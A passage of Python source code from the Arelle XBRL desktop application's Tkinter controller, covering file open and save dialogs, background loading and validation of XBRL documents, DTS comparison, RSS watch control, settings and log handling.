filetypes=[(_("XBRL instance .xbrl"), "*.xbrl"), (_("XBRL instance .xml"), "*.xml")],
defaultextension=".xbrl")
elif isinstance(view, ViewWinTests.ViewTests) and modelXbrl.modelDocument.type in (ModelDocument.Type.TESTCASESINDEX, ModelDocument.Type.TESTCASE):
filename = self.uiFileDialog("save",
title=_("arelle - Save Test Results"),
initialdir=os.path.dirname(self.modelManager.modelXbrl.modelDocument.uri),
filetypes=[(_("CSV file"), "*.csv")],
defaultextension=".csv")
if not filename:
return False
try:
ViewFileTests.viewTests(self.modelManager.modelXbrl, filename)
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
filename, err),
parent=self.parent)
return True
elif isinstance(view, ViewWinTree.ViewTree):
filename = self.uiFileDialog("save",
title=_("arelle - Save {0}").format(view.tabTitle),
initialdir=os.path.dirname(self.modelManager.modelXbrl.modelDocument.uri),
filetypes=[(_("CSV file"), "*.csv"),(_("HTML file"), "*.html"),(_("XML file"), "*.xml"),(_("JSON file"), "*.json")],
defaultextension=".csv")
if not filename:
return False
try:
if isinstance(view, ViewWinRoleTypes.ViewRoleTypes):
ViewFileRoleTypes.viewRoleTypes(modelXbrl, filename, view.tabTitle, view.isArcrole, lang=view.lang)
elif isinstance(view, ViewWinConcepts.ViewConcepts):
ViewFileConcepts.viewConcepts(modelXbrl, filename, labelrole=view.labelrole, lang=view.lang)
else:
ViewFileRelationshipSet.viewRelationshipSet(modelXbrl, filename, view.tabTitle, view.arcrole, labelrole=view.labelrole, lang=view.lang)
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
filename, err),
parent=self.parent)
return True
elif isinstance(view, ViewWinXml.ViewXml) and self.modelManager.modelXbrl.formulaOutputInstance:
filename = self.uiFileDialog("save",
title=_("arelle - Save Formula Result Instance Document"),
initialdir=os.path.dirname(self.modelManager.modelXbrl.modelDocument.uri),
filetypes=[(_("XBRL output instance .xml"), "*.xml"), (_("XBRL output instance .xbrl"), "*.xbrl")],
defaultextension=".xml")
if not filename:
return False
try:
from arelle import XmlUtil
with open(filename, "w") as fh:
XmlUtil.writexml(fh, self.modelManager.modelXbrl.formulaOutputInstance.modelDocument.xmlDocument, encoding="utf-8")
self.addToLog(_("[info] Saved formula output instance to {0}").format(filename) )
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
self.filename, err),
parent=self.parent)
return True
tkinter.messagebox.showwarning(_("arelle - Save what?"),
_("Nothing has been selected that can be saved. \nPlease select a view pane that can be saved."),
parent=self.parent)
'''
if self.filename is None:
filename = self.uiFileDialog("save",
title=_("arelle - Save File"),
initialdir=".",
filetypes=[(_("Xbrl file"), "*.x*")],
defaultextension=".xbrl")
if not filename:
return False
self.filename = filename
if not self.filename.endswith(".xbrl"):
self.filename += ".xbrl"
try:
with open(self.filename, "wb") as fh:
pickle.dump(self.data, fh, pickle.HIGHEST_PROTOCOL)
self.dirty = False
self.uiShowStatus(_("Saved {0} items to {1}").format(
len(self.data),
self.filename), clearAfter=5000)
self.parent.title(_("arelle - {0}").format(
os.path.basename(self.filename)))
except (EnvironmentError, pickle.PickleError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
self.filename, err),
parent=self.parent)
return True;
'''
def fileSaveExistingFile(self, event=None, view=None, fileType=None, *ignore):
return self.fileSave(view=view, fileType=fileType, filenameFromInstance=True)
def saveDTSpackage(self):
self.modelManager.saveDTSpackage(allDTSes=True)
def fileOpen(self, *ignore):
if not self.okayToContinue():
return
filename = self.uiFileDialog("open",
title=_("arelle - Open file"),
initialdir=self.config.setdefault("fileOpenDir","."),
filetypes=[(_("XBRL files"), "*.*")],
defaultextension=".xbrl")
if self.isMSW and "/Microsoft/Windows/Temporary Internet Files/Content.IE5/" in filename:
tkinter.messagebox.showerror(_("Loading web-accessed files"),
_('Please open web-accessed files with the second toolbar button, "Open web file", or the File menu, second entry, "Open web..."'), parent=self.parent)
return
if os.sep == "\\":
filename = filename.replace("/", "\\")
self.fileOpenFile(filename)
def importFileOpen(self, *ignore):
if not self.modelManager.modelXbrl or self.modelManager.modelXbrl.modelDocument.type not in (
ModelDocument.Type.SCHEMA, ModelDocument.Type.LINKBASE, ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL):
tkinter.messagebox.showwarning(_("arelle - Warning"),
_("Import requires an opened DTS"), parent=self.parent)
return False
filename = self.uiFileDialog("open",
title=_("arelle - Import file into opened DTS"),
initialdir=self.config.setdefault("importOpenDir","."),
filetypes=[(_("XBRL files"), "*.*")],
defaultextension=".xml")
if self.isMSW and "/Microsoft/Windows/Temporary Internet Files/Content.IE5/" in filename:
tkinter.messagebox.showerror(_("Loading web-accessed files"),
_('Please import web-accessed files with the File menu, fourth entry, "Import web..."'), parent=self.parent)
return
if os.sep == "\\":
filename = filename.replace("/", "\\")
self.fileOpenFile(filename, importToDTS=True)
def updateFileHistory(self, url, importToDTS):
key = "importHistory" if importToDTS else "fileHistory"
fileHistory = self.config.setdefault(key, [])
while fileHistory.count(url) > 0:
fileHistory.remove(url)
if len(fileHistory) > 10:
fileHistory[10:] = []
fileHistory.insert(0, url)
self.config[key] = fileHistory
self.loadFileMenuHistory()
self.saveConfig()
def fileOpenFile(self, filename, importToDTS=False, selectTopView=False):
if filename:
filesource = None
# check for archive files
filesource = openFileSource(filename, self,
checkIfXmlIsEis=self.modelManager.disclosureSystem and
self.modelManager.disclosureSystem.validationType == "EFM")
if filesource.isArchive and not filesource.selection: # or filesource.isRss:
from arelle import DialogOpenArchive
filename = DialogOpenArchive.askArchiveFile(self, filesource)
if filename:
if importToDTS:
if not isHttpUrl(filename):
self.config["importOpenDir"] = os.path.dirname(filename)
else:
if not isHttpUrl(filename):
self.config["fileOpenDir"] = os.path.dirname(filesource.baseurl if filesource.isArchive else filename)
self.updateFileHistory(filename, importToDTS)
thread = threading.Thread(target=lambda: self.backgroundLoadXbrl(filesource,importToDTS,selectTopView))
thread.daemon = True
thread.start()
def webOpen(self, *ignore):
if not self.okayToContinue():
return
url = DialogURL.askURL(self.parent, buttonSEC=True, buttonRSS=True)
if url:
self.updateFileHistory(url, False)
filesource = openFileSource(url,self)
if filesource.isArchive and not filesource.selection: # or filesource.isRss:
from arelle import DialogOpenArchive
url = DialogOpenArchive.askArchiveFile(self, filesource)
self.updateFileHistory(url, False)
thread = threading.Thread(target=lambda: self.backgroundLoadXbrl(filesource,False,False))
thread.daemon = True
thread.start()
def importWebOpen(self, *ignore):
if not self.modelManager.modelXbrl or self.modelManager.modelXbrl.modelDocument.type not in (
ModelDocument.Type.SCHEMA, ModelDocument.Type.LINKBASE, ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL):
tkinter.messagebox.showwarning(_("arelle - Warning"),
_("Import requires an opened DTS"), parent=self.parent)
return False
url = DialogURL.askURL(self.parent, buttonSEC=False, buttonRSS=False)
if url:
self.fileOpenFile(url, importToDTS=True)
def backgroundLoadXbrl(self, filesource, importToDTS, selectTopView):
startedAt = time.time()
try:
if importToDTS:
action = _("imported")
profileStat = "import"
modelXbrl = self.modelManager.modelXbrl
if modelXbrl:
ModelDocument.load(modelXbrl, filesource.url, isSupplemental=importToDTS)
modelXbrl.relationshipSets.clear() # relationships have to be re-cached
else:
action = _("loaded")
profileStat = "load"
modelXbrl = self.modelManager.load(filesource, _("views loading"))
except ModelDocument.LoadingException:
self.showStatus(_("Loading terminated, unrecoverable error"), 20000)
return
except Exception as err:
msg = _("Exception loading {0}: {1}, at {2}").format(
filesource.url,
err,
traceback.format_tb(sys.exc_info()[2]))
# not sure if message box can be shown from background thread
# tkinter.messagebox.showwarning(_("Exception loading"),msg, parent=self.parent)
self.addToLog(msg);
self.showStatus(_("Loading terminated, unrecoverable error"), 20000)
return
if modelXbrl and modelXbrl.modelDocument:
statTime = time.time() - startedAt
modelXbrl.profileStat(profileStat, statTime)
self.addToLog(format_string(self.modelManager.locale,
_("%s in %.2f secs"),
(action, statTime)))
if modelXbrl.hasTableRendering:
self.showStatus(_("Initializing table rendering"))
RenderingEvaluator.init(modelXbrl)
self.showStatus(_("{0}, preparing views").format(action))
self.waitForUiThreadQueue() # force status update
self.uiThreadQueue.put((self.showLoadedXbrl, [modelXbrl, importToDTS, selectTopView]))
else:
self.addToLog(format_string(self.modelManager.locale,
_("not successfully %s in %.2f secs"),
(action, time.time() - startedAt)))
def showLoadedXbrl(self, modelXbrl, attach, selectTopView=False):
startedAt = time.time()
currentAction = "setting title"
topView = None
self.currentView = None
try:
if attach:
modelXbrl.closeViews()
self.parent.title(_("arelle - {0}").format(
os.path.basename(modelXbrl.modelDocument.uri)))
self.setValidateTooltipText()
if modelXbrl.modelDocument.type in ModelDocument.Type.TESTCASETYPES:
currentAction = "tree view of tests"
ViewWinTests.viewTests(modelXbrl, self.tabWinTopRt)
topView = modelXbrl.views[-1]
elif modelXbrl.modelDocument.type == ModelDocument.Type.VERSIONINGREPORT:
currentAction = "view of versioning report"
ViewWinVersReport.viewVersReport(modelXbrl, self.tabWinTopRt)
from arelle.ViewWinDiffs import ViewWinDiffs
ViewWinDiffs(modelXbrl, self.tabWinBtm, lang=self.labelLang)
elif modelXbrl.modelDocument.type == ModelDocument.Type.RSSFEED:
currentAction = "view of RSS feed"
ViewWinRssFeed.viewRssFeed(modelXbrl, self.tabWinTopRt)
topView = modelXbrl.views[-1]
else:
if modelXbrl.hasTableIndexing:
currentAction = "table index view"
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopLeft, ("Tables", (XbrlConst.euGroupTable,)), lang=self.labelLang,
treeColHdr="Table Index", showLinkroles=False, showColumns=False, expandAll=True)
elif modelXbrl.modelDocument.type in (ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL, ModelDocument.Type.INLINEXBRLDOCUMENTSET):
currentAction = "table index view"
firstTableLinkroleURI, indexLinkroleURI = TableStructure.evaluateTableIndex(modelXbrl)
if firstTableLinkroleURI:
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopLeft, ("Tables", (XbrlConst.parentChild,)), lang=self.labelLang, linkrole=indexLinkroleURI,
treeColHdr="Table Index", showRelationships=False, showColumns=False, expandAll=False, hasTableIndex=True)
'''
elif (modelXbrl.modelDocument.type in (ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL, ModelDocument.Type.INLINEXBRLDOCUMENTSET) and
not modelXbrl.hasTableRendering):
currentAction = "facttable ELRs view"
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopLeft, ("Tables", (XbrlConst.parentChild,)), lang=self.labelLang,
treeColHdr="Fact Table Index", showLinkroles=True, showColumns=False, showRelationships=False, expandAll=False)
'''
currentAction = "tree view of tests"
ViewWinDTS.viewDTS(modelXbrl, self.tabWinTopLeft, altTabWin=self.tabWinTopRt)
currentAction = "view of concepts"
ViewWinConcepts.viewConcepts(modelXbrl, self.tabWinBtm, "Concepts", lang=self.labelLang, altTabWin=self.tabWinTopRt)
if modelXbrl.hasTableRendering: # show rendering grid even without any facts
ViewWinRenderedGrid.viewRenderedGrid(modelXbrl, self.tabWinTopRt, lang=self.labelLang)
if topView is None: topView = modelXbrl.views[-1]
if modelXbrl.modelDocument.type in (ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL, ModelDocument.Type.INLINEXBRLDOCUMENTSET):
currentAction = "table view of facts"
if not modelXbrl.hasTableRendering: # table view only if not grid rendered view
ViewWinFactTable.viewFacts(modelXbrl, self.tabWinTopRt, linkrole=firstTableLinkroleURI, lang=self.labelLang, expandAll=firstTableLinkroleURI)
if topView is None: topView = modelXbrl.views[-1]
currentAction = "tree/list of facts"
ViewWinFactList.viewFacts(modelXbrl, self.tabWinTopRt, lang=self.labelLang)
if topView is None: topView = modelXbrl.views[-1]
if modelXbrl.hasFormulae:
currentAction = "formulae view"
ViewWinFormulae.viewFormulae(modelXbrl, self.tabWinTopRt)
if topView is None: topView = modelXbrl.views[-1]
currentAction = "presentation linkbase view"
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, XbrlConst.parentChild, lang=self.labelLang)
if topView is None: topView = modelXbrl.views[-1]
currentAction = "calculation linkbase view"
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, XbrlConst.summationItem, lang=self.labelLang)
currentAction = "dimensions relationships view"
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, "XBRL-dimensions", lang=self.labelLang)
if modelXbrl.hasTableRendering:
currentAction = "rendering view"
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, "Table-rendering", lang=self.labelLang)
for name, arcroles in sorted(self.config.get("arcroleGroups", {}).items()):
if XbrlConst.arcroleGroupDetect in arcroles:
currentAction = name + " view"
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, (name, arcroles), lang=self.labelLang)
currentAction = "property grid"
ViewWinProperties.viewProperties(modelXbrl, self.tabWinTopLeft)
currentAction = "log view creation time"
viewTime = time.time() - startedAt
modelXbrl.profileStat("view", viewTime)
self.addToLog(format_string(self.modelManager.locale,
_("views %.2f secs"), viewTime))
if selectTopView and topView:
topView.select()
self.currentView = topView
for xbrlLoadedMethod in pluginClassMethods("CntlrWinMain.Xbrl.Loaded"):
xbrlLoadedMethod(self, modelXbrl, attach) # runs in GUI thread
except Exception as err:
msg = _("Exception preparing {0}: {1}, at {2}").format(
currentAction,
err,
traceback.format_tb(sys.exc_info()[2]))
tkinter.messagebox.showwarning(_("Exception preparing view"),msg, parent=self.parent)
self.addToLog(msg);
self.showStatus(_("Ready..."), 2000)
def showFormulaOutputInstance(self, priorOutputInstance, currentOutputInstance):
currentAction = "closing prior formula output instance"
try:
if priorOutputInstance: # if has UI must close on UI thread, not background thread
priorOutputInstance.close()
currentAction = "showing resulting formula output instance"
if currentOutputInstance:
ViewWinXml.viewXml(currentOutputInstance, self.tabWinBtm, "Formula Output Instance", currentOutputInstance.modelDocument.xmlDocument)
except Exception as err:
msg = _("Exception {0}: {1}, at {2}").format(
currentAction,
err,
traceback.format_tb(sys.exc_info()[2]))
tkinter.messagebox.showwarning(_("Exception preparing view"),msg, parent=self.parent)
self.addToLog(msg);
self.showStatus(_("Ready..."), 2000)
def showProfileStats(self):
modelXbrl = self.modelManager.modelXbrl
if modelXbrl and self.modelManager.collectProfileStats:
modelXbrl.logProfileStats()
def clearProfileStats(self):
modelXbrl = self.modelManager.modelXbrl
if modelXbrl and self.modelManager.collectProfileStats:
modelXbrl.profileStats.clear()
def fileClose(self, *ignore):
if not self.okayToContinue():
return
self.modelManager.close()
self.parent.title(_("arelle - Unnamed"))
self.setValidateTooltipText()
self.currentView = None
def validate(self):
modelXbrl = self.modelManager.modelXbrl
if modelXbrl:
if (modelXbrl.modelManager.validateDisclosureSystem and
not modelXbrl.modelManager.disclosureSystem.selection):
tkinter.messagebox.showwarning(_("arelle - Warning"),
_("Validation - disclosure system checks is requested but no disclosure system is selected, please select one by validation - select disclosure system."),
parent=self.parent)
else:
if modelXbrl.modelDocument.type in ModelDocument.Type.TESTCASETYPES:
for pluginXbrlMethod in pluginClassMethods("Testcases.Start"):
pluginXbrlMethod(self, None, modelXbrl)
thread = threading.Thread(target=lambda: self.backgroundValidate())
thread.daemon = True
thread.start()
def backgroundValidate(self):
startedAt = time.time()
modelXbrl = self.modelManager.modelXbrl
priorOutputInstance = modelXbrl.formulaOutputInstance
modelXbrl.formulaOutputInstance = None # prevent closing on background thread by validateFormula
self.modelManager.validate()
self.addToLog(format_string(self.modelManager.locale,
_("validated in %.2f secs"),
time.time() - startedAt))
if not modelXbrl.isClosed and (priorOutputInstance or modelXbrl.formulaOutputInstance):
self.uiThreadQueue.put((self.showFormulaOutputInstance, [priorOutputInstance, modelXbrl.formulaOutputInstance]))
self.uiThreadQueue.put((self.logSelect, []))
def compareDTSes(self):
countLoadedDTSes = len(self.modelManager.loadedModelXbrls)
if countLoadedDTSes != 2:
tkinter.messagebox.showwarning(_("arelle - Warning"),
_("Two DTSes are required for the Compare DTSes operation, {0} found").format(countLoadedDTSes),
parent=self.parent)
return False
versReportFile = self.uiFileDialog("save",
title=_("arelle - Save Versioning Report File"),
initialdir=self.config.setdefault("versioningReportDir","."),
filetypes=[(_("Versioning report file"), "*.xml")],
defaultextension=".xml")
if not versReportFile:
return False
self.config["versioningReportDir"] = os.path.dirname(versReportFile)
self.saveConfig()
thread = threading.Thread(target=lambda: self.backgroundCompareDTSes(versReportFile))
thread.daemon = True
thread.start()
def backgroundCompareDTSes(self, versReportFile):
startedAt = time.time()
modelVersReport = self.modelManager.compareDTSes(versReportFile)
if modelVersReport and modelVersReport.modelDocument:
self.addToLog(format_string(self.modelManager.locale,
_("compared in %.2f secs"),
time.time() - startedAt))
self.uiThreadQueue.put((self.showComparedDTSes, [modelVersReport]))
def showComparedDTSes(self, modelVersReport):
# close prior DTS displays
modelVersReport.modelDocument.fromDTS.closeViews()
modelVersReport.modelDocument.toDTS.closeViews()
self.showLoadedXbrl(modelVersReport, True)
def loadFile(self, filename):
self.filename = filename
self.listBox.delete(0, END)
self.dirty = False
try:
with open(self.filename, "rb") as fh:
self.data = pickle.load(fh)
for name in sorted(self.data, key=str.lower):
self.listBox.insert(END, name)
self.showStatus(_("Loaded {0} items from {1}").format(
self.listbox.size(),
self.filename), clearAfter=5000)
self.parent.title(_("arelle - {0}").format(
os.path.basename(self.filename)))
except (EnvironmentError, pickle.PickleError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to load {0}\n{1}").format(
self.filename,
err),
parent=self.parent)
def quit(self, event=None, restartAfterQuit=False):
if self.okayToContinue():
self.modelManager.close()
logging.shutdown()
global restartMain
restartMain = restartAfterQuit
state = self.parent.state()
if state == "normal":
self.config["windowGeometry"] = self.parent.geometry()
if state in ("normal", "zoomed"):
self.config["windowState"] = state
if self.isMSW: adjustW = 4; adjustH = 6 # tweak to prevent splitter regions from growing on reloading
elif self.isMac: adjustW = 54; adjustH = 39
else: adjustW = 2; adjustH = 2 # linux (tested on ubuntu)
self.config["tabWinTopLeftSize"] = (self.tabWinTopLeft.winfo_width() - adjustW,
self.tabWinTopLeft.winfo_height() - adjustH)
super(CntlrWinMain, self).close(saveConfig=True)
self.parent.unbind_all(())
self.parent.destroy()
if self.logFile:
self.logFile.close()
self.logFile = None
def restart(self, event=None):
self.quit(event, restartAfterQuit=True)
def setWorkOffline(self, *args):
self.webCache.workOffline = self.workOffline.get()
self.config["workOffline"] = self.webCache.workOffline
self.saveConfig()
def confirmClearWebCache(self):
if tkinter.messagebox.askyesno(
_("arelle - Clear Internet Cache"),
_("Are you sure you want to clear the internet cache?"),
parent=self.parent):
def backgroundClearCache():
self.showStatus(_("Clearing internet cache"))
self.webCache.clear()
self.showStatus(_("Internet cache cleared"), 5000)
thread = threading.Thread(target=lambda: backgroundClearCache())
thread.daemon = True
thread.start()
def manageWebCache(self):
if sys.platform.startswith("win"):
command = 'explorer'
elif sys.platform in ("darwin", "macos"):
command = 'open'
else: # linux/unix
command = 'xdg-open'
try:
subprocess.Popen([command,self.webCache.cacheDir])
except:
pass
def setupProxy(self):
from arelle.DialogUserPassword import askProxy
proxySettings = askProxy(self.parent, self.config.get("proxySettings"))
if proxySettings:
self.webCache.resetProxies(proxySettings)
self.config["proxySettings"] = proxySettings
self.saveConfig()
def setValidateDisclosureSystem(self, *args):
self.modelManager.validateDisclosureSystem = self.validateDisclosureSystem.get()
self.config["validateDisclosureSystem"] = self.modelManager.validateDisclosureSystem
self.saveConfig()
if self.modelManager.validateDisclosureSystem:
if not self.modelManager.disclosureSystem or not self.modelManager.disclosureSystem.selection:
self.selectDisclosureSystem()
self.setValidateTooltipText()
def selectDisclosureSystem(self, *args):
from arelle import DialogOpenArchive
self.config["disclosureSystem"] = DialogOpenArchive.selectDisclosureSystem(self, self.modelManager.disclosureSystem)
self.saveConfig()
self.setValidateTooltipText()
def formulaParametersDialog(self, *args):
DialogFormulaParameters.getParameters(self)
self.setValidateTooltipText()
def rssWatchOptionsDialog(self, *args):
from arelle import DialogRssWatch
DialogRssWatch.getOptions(self)
# find or open rssWatch view
def rssWatchControl(self, start=False, stop=False, close=False):
from arelle.ModelDocument import Type
from arelle import WatchRss
if not self.modelManager.rssWatchOptions.get("feedSourceUri"):
tkinter.messagebox.showwarning(_("RSS Watch Control Error"),
_("RSS Feed is not set up, please select options and select feed"),
parent=self.parent)
return False
rssModelXbrl = None
for loadedModelXbrl in self.modelManager.loadedModelXbrls:
if (loadedModelXbrl.modelDocument.type == Type.RSSFEED and
loadedModelXbrl.modelDocument.uri == self.modelManager.rssWatchOptions.get("feedSourceUri")):
rssModelXbrl = loadedModelXbrl
break
#not loaded
if start:
if not rssModelXbrl:
rssModelXbrl = self.modelManager.create(Type.RSSFEED, self.modelManager.rssWatchOptions.get("feedSourceUri"))
self.showLoadedXbrl(rssModelXbrl, False)
if not hasattr(rssModelXbrl,"watchRss"):
WatchRss.initializeWatcher(rssModelXbrl)
rssModelXbrl.watchRss.start()
elif stop:
if rssModelXbrl and rssModelXbrl.watchRss:
rssModelXbrl.watchRss.stop()
# for ui thread option updating
def rssWatchUpdateOption(self, latestPubDate=None):
self.uiThreadQueue.put((self.uiRssWatchUpdateOption, [latestPubDate]))
# ui thread addToLog
def uiRssWatchUpdateOption(self, latestPubDate):
if latestPubDate:
self.modelManager.rssWatchOptions["latestPubDate"] = latestPubDate
self.config["rssWatchOptions"] = self.modelManager.rssWatchOptions
self.saveConfig()
def languagesDialog(self, *args):
override = self.lang if self.lang != self.modelManager.defaultLang else ""
import tkinter.simpledialog
newValue = tkinter.simpledialog.askstring(_("arelle - Labels language code setting"),
_("The system default language is: {0} \n\n"
"You may override with a different language for labels display. \n\n"
"Current language override code: {1} \n"
"(Leave empty to use the system default language.)").format(
self.modelManager.defaultLang, override),
parent=self.parent)
if newValue is not None:
self.config["labelLangOverride"] = newValue
if newValue:
self.lang = newValue
else:
self.lang = self.modelManager.defaultLang
if self.modelManager.modelXbrl and self.modelManager.modelXbrl.modelDocument:
self.showLoadedXbrl(self.modelManager.modelXbrl, True) # reload views
self.saveConfig()
def setValidateTooltipText(self):
if self.modelManager.modelXbrl and not self.modelManager.modelXbrl.isClosed and self.modelManager.modelXbrl.modelDocument is not None:
valType = self.modelManager.modelXbrl.modelDocument.type
if valType in (ModelDocument.Type.SCHEMA, ModelDocument.Type.LINKBASE):
valName = "DTS"
else:
valName = ModelDocument.Type.typeName[valType]
if valType == ModelDocument.Type.VERSIONINGREPORT:
v = _("Validate versioning report")
else:
if self.modelManager.validateCalcLB:
if self.modelManager.validateInferDecimals:
c = _("\nCheck calculations (infer decimals)")
else:
c = _("\nCheck calculations (infer precision)")
else:
c = ""
if self.modelManager.validateUtr:
u = _("\nCheck unit type registry")
else:
u = ""
if self.modelManager.validateDisclosureSystem:
v = _("Validate {0}\nCheck disclosure system rules\n{1}{2}{3}").format(
valName, self.modelManager.disclosureSystem.selection,c,u)
else:
v = _("Validate {0}{1}{2}").format(valName, c, u)
else:
v = _("Validate")
self.validateTooltipText.set(v)
def setValidateCalcLB(self, *args):
self.modelManager.validateCalcLB = self.validateCalcLB.get()
self.config["validateCalcLB"] = self.modelManager.validateCalcLB
self.saveConfig()
self.setValidateTooltipText()
def setValidateInferDecimals(self, *args):
self.modelManager.validateInferDecimals = self.validateInferDecimals.get()
self.config["validateInferDecimals"] = self.modelManager.validateInferDecimals
self.saveConfig()
self.setValidateTooltipText()
def setValidateUtr(self, *args):
self.modelManager.validateUtr = self.validateUtr.get()
self.config["validateUtr"] = self.modelManager.validateUtr
self.saveConfig()
self.setValidateTooltipText()
def setCollectProfileStats(self, *args):
self.modelManager.collectProfileStats = self.collectProfileStats.get()
self.config["collectProfileStats"] = self.modelManager.collectProfileStats
self.saveConfig()
def setShowDebugMessages(self, *args):
self.config["showDebugMessages"] = self.showDebugMessages.get()
self.saveConfig()
def find(self, *args):
from arelle.DialogFind import find
find(self)
def helpAbout(self, event=None):
from arelle import DialogAbout, Version
from lxml import etree
DialogAbout.about(self.parent,
_("About arelle"),
os.path.join(self.imagesDir, "arelle32.gif"),
_("arelle\u00ae {0} {1}bit {2}\n"
"An open source XBRL platform\n"
"\u00a9 2010-2015 Mark V Systems Limited\n"
"All rights reserved\nhttp://www.arelle.org\nsupport@arelle.org\n\n"
"Licensed under the Apache License, Version 2.0 (the \"License\"); "
"you may not use this file except in compliance with the License. "
"You may obtain a copy of the License at\n\n"
"http://www.apache.org/licenses/LICENSE-2.0\n\n"
"Unless required by applicable law or agreed to in writing, software "
"distributed under the License is distributed on an \"AS IS\" BASIS, "
"WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. "
"See the License for the specific language governing permissions and "
"limitations under the License."
"\n\nIncludes:"
"\n Python\u00ae {4[0]}.{4[1]}.{4[2]} \u00a9 2001-2013 Python Software Foundation"
"\n PyParsing \u00a9 2003-2013 Paul T. McGuire"
"\n lxml {5[0]}.{5[1]}.{5[2]} \u00a9 2004 Infrae, ElementTree \u00a9 1999-2004 by Fredrik Lundh"
"\n xlrd \u00a9 2005-2013 Stephen J. Machin, Lingfo Pty Ltd, \u00a9 2001 D. Giffin, \u00a9 2000 A. Khan"
"\n xlwt \u00a9 2007 Stephen J. Machin, Lingfo Pty Ltd, \u00a9 2005 R. V. Kiseliov"
"{3}"
"\n May include installable plug-in modules with author-specific license terms"
)
.format(self.__version__, self.systemWordSize, Version.version,
_("\n Bottle \u00a9 2011-2013 Marcel Hellkamp") if self.hasWebServer else "",
sys.version_info, etree.LXML_VERSION))
# worker threads addToLog
def addToLog(self, message, messageCode="", messageArgs=None, file="", refs=[], level=logging.INFO):
if level == logging.DEBUG and not self.showDebugMessages.get():
return
if messageCode and messageCode not in message: # prepend message code
message = "[{}] {}".format(messageCode, message)
if refs:
message += " - " + Cntlr.logRefsFileLines(refs)
elif file:
if isinstance(file, (tuple,list,set)):
message += " - " + ", ".join(file)
elif isinstance(file, _STR_BASE):
message += " - " + file
if isinstance(messageArgs, dict):
message = message % messageArgs
self.uiThreadQueue.put((self.uiAddToLog, [message]))
# ui thread addToLog
def uiAddToLog(self, message):
try:
self.logView.append(message)
except:
pass
def logClear(self, *ignore):
self.logView.clear()
def logSelect(self, *ignore):
self.logView.select()
def logSaveToFile(self, *ignore):
filename = self.uiFileDialog("save",
title=_("arelle - Save Messages Log"),
initialdir=".",
filetypes=[(_("Txt file"), "*.txt")],
defaultextension=".txt")
if not filename:
return False
try:
self.logView.saveToFile(filename)
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
filename, err),
parent=self.parent)
return True;
# worker threads viewModelObject
def viewModelObject(self, modelXbrl, objectId):
self.waitForUiThreadQueue() # force prior ui view updates if any
self.uiThreadQueue.put((self.uiViewModelObject, [modelXbrl, objectId]))
# ui thread viewModelObject
def uiViewModelObject(self, modelXbrl, objectId):
modelXbrl.viewModelObject(objectId)
# worker threads viewModelObject
def reloadViews(self, modelXbrl):
self.uiThreadQueue.put((self.uiReloadViews, [modelXbrl]))
# ui thread viewModelObject
def uiReloadViews(self, modelXbrl):
for view in modelXbrl.views:
view.view()
# worker threads showStatus
def showStatus(self, message, clearAfter=None):
self.uiThreadQueue.put((self.uiShowStatus, [message, clearAfter]))
# ui thread showStatus
def uiClearStatusTimerEvent(self):
if self.statusbarTimerId: # if timer still wanted, clear status
self.statusbar["text"] = ""
self.statusbarTimerId = None
def uiShowStatus(self, message, clearAfter=None):
if self.statusbarTimerId: # ignore timer
self.statusbarTimerId = None
self.statusbar["text"] = message
if clearAfter is not None and clearAfter > 0:
self.statusbarTimerId = self.statusbar.after(clearAfter, self.uiClearStatusTimerEvent)
# web authentication password request
def internet_user_password(self, host, realm):
from arelle.DialogUserPassword import askUserPassword
untilDone = threading.Event()
result = []
self.uiThreadQueue.put((askUserPassword, [self.parent, host, realm, untilDone, result]))
untilDone.wait()
return result[0]
# web file login requested
def internet_logon(self, url, quotedUrl, dialogCaption, dialogText):
from arelle.DialogUserPassword import askInternetLogon
untilDone = threading.Event()
result = []
self.uiThreadQueue.put((askInternetLogon, [self.parent, url, quotedUrl, dialogCaption, dialogText, untilDone, result]))
untilDone.wait()
return result[0]
def waitForUiThreadQueue(self):
for i in range(40): # max 2 secs
if self.uiThreadQueue.empty():
break
time.sleep(0.05)
def uiThreadChecker(self, widget, delayMsecs=100): # 10x per second
# process callback on main (UI) thread
while not self.uiThreadQueue.empty():
try:
(callback, args) = self.uiThreadQueue.get(block=False)
except queue.Empty:
pass
else:
callback(*args)
widget.after(delayMsecs, lambda: self.uiThreadChecker(widget))
def uiFileDialog(self, action, title=None, initialdir=None, filetypes=[], defaultextension=None, owner=None, multiple=False, parent=None):
if parent is None: parent = self.parent
if multiple and action == "open": # return as simple list of file names
multFileNames = tkinter.filedialog.askopenfilename(
multiple=True,
title=title,
initialdir=initialdir,
filetypes=[] if self.isMac else filetypes,
defaultextension=defaultextension,
parent=parent)
if self.isMac:
return multFileNames
return re.findall("[{]([^}]+)[}]", # multiple returns "{file1} {file2}..."
multFileNames)
elif self.hasWin32gui:
import win32gui
try:
filename, filter, flags = {"open":win32gui.GetOpenFileNameW,
"save":win32gui.GetSaveFileNameW}[action](
hwndOwner=(owner if owner else parent).winfo_id(),
hInstance=win32gui.GetModuleHandle(None),
